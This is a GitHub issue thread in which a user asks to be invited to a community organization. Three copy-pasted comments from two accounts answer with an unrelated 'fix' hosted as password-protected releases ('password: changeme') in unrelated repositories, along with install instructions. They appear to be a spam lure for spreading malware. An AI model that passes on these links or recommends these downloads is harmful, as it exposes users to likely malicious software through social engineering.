### ISSUE TITLE
invite me to organization

### ISSUE THREAD

**Issue by Daniel-Kennison** [Bauddhik-Geeks/Welcome-to-Bauddhik-Geeks#509]
### Contact Details

miguelcyandex130@gmail.com

### Discord Username

aidev80

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by Amrithesh-k** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Amrithesh-k** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/aravinda-gamage/x86_64-win64-ranlib/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
